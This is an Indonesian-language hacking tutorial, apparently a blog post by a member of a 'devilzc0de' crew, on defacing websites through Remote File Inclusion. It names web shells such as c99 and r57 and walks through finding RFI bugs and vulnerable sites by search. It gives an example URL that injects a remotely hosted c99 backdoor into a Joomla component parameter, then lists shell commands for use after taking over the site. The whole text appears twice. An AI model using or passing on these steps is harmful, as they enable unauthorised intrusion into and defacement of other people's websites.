Cara mendefaca dengan RFI (Remote File Inclusion)
Author : kiddies As cr4sh3r_1412
E-mail : crasher_1412 [at] yahoo [dot] com
ketemu lagi dengan gue, ini adalah tutorial kedua gue, mungkin gue disini akan menceritakanbagaimana akhirnya bisa mengerti metode RFI Hacking
sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-hell dahulu,sebab nanti ini kan di pakai dalam RFI
macam-macam web-shell:
1. c99
2. c100
3. r57
4. ekin0x
5. locus7
bagamana mencarinya backdoor tersebut, kita cari melalui google
lagi-lagi intro nih, yups betul, agar lebih paham aja gitu
RFI apa itu????
RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2...........
AMIEN !!!
=======
KEDUA
=======
ok setelah kita bedoa, bukalah www.milw0rm.com
kemudian klik search
kemudian tulislah RFI
========
KETIGA
========
udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu
=========
KEEMPAT
=========
setelah kita dapat bugnya kemudian kita search denga google
example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]
========
KELIMA
========
kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor
example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyague.net/backdoor/c99.txt??
========
KEENAM
========
apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda...
perintah yang berguna saat melakukan aktivitas backdooring:
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
sekian tutorial dari gue, bukannya gue mau sok tahu, tapi gue cuma mau berbagi apa yang udah gue dapet selama ini, apabila da yang kurang
mohon muf
gretz: Mywisdom,flyf_666,petimati,7460,gunslinger_,sat_ n soon
we are devilzc0de crew run with bug n exploits
E-mail : crasher_1412 [at] yahoo [dot] com
ketemu lagi dengan gue, ini adalah tutorial kedua gue, mungkin gue disini akan menceritakanbagaimana akhirnya bisa mengerti metode RFI Hacking
sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-hell dahulu,sebab nanti ini kan di pakai dalam RFI
macam-macam web-shell:
1. c99
2. c100
3. r57
4. ekin0x
5. locus7
bagamana mencarinya backdoor tersebut, kita cari melalui google
lagi-lagi intro nih, yups betul, agar lebih paham aja gitu
RFI apa itu????
RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2...........
AMIEN !!!
=======
KEDUA
=======
ok setelah kita bedoa, bukalah www.milw0rm.com
kemudian klik search
kemudian tulislah RFI
========
KETIGA
========
udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu
=========
KEEMPAT
=========
setelah kita dapat bugnya kemudian kita search denga google
example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]
========
KELIMA
========
kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor
example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyague.net/backdoor/c99.txt??
========
KEENAM
========
apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda...
perintah yang berguna saat melakukan aktivitas backdooring:
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
sekian tutorial dari gue, bukannya gue mau sok tahu, tapi gue cuma mau berbagi apa yang udah gue dapet selama ini, apabila da yang kurang
mohon muf
gretz: Mywisdom,flyf_666,petimati,7460,gunslinger_,sat_ n soon
we are devilzc0de crew run with bug n exploits
0 komentar: